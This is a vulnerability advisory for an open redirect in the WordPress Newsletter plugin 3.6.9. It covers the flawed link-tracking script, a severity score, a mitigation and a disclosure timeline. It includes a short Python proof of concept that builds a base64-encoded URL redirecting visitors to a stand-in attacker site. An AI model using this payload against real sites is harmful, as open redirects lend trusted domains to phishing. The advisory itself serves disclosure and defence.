Newsletter 3.6.9, Open Redirect

The Newsletter plugin is susceptible to an Open Redirect vulnerability. This issue is due to the fact user input it taken, and trusted, without validation. This user input is used when tracking link clicks, via the ‘newsletter/statistics/link.php’ script. User input is Base64 encoded, and split on the ‘;’ character, the third column of which can be manipulated in order to control where the user is redirected to.

Homepage

https://wordpress.org/plugins/newsletter/

CVSS Score

5

CSSS Vector

(AV:N/AC:L/Au:N/C:N/I:P/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Sanitize user input – ensure provided URLs are valid, or do not allow user input of URLs at all.

Proof of Concept

The following script will generate a URL, which when visited will cause the user to be redirected to the site ‘http://evilsite.com’.

import base64
target_url = "http://evilsite.com"
target_blog = "http://localhost"
payload = base64.b64encode("0;0;%s;0"%target_url)
print "%s/wp-content/plugins/newsletter/statistics/link.php?r=%s"%(target_blog,payload)

Timeline

  • 2015-03-16: Discovered
  • 2015-03-16: Vendor notified
  • 2015-03-17: Version 3.7.0 released – issue still present
  • 2015-03-30: No reply from vendor – advisory released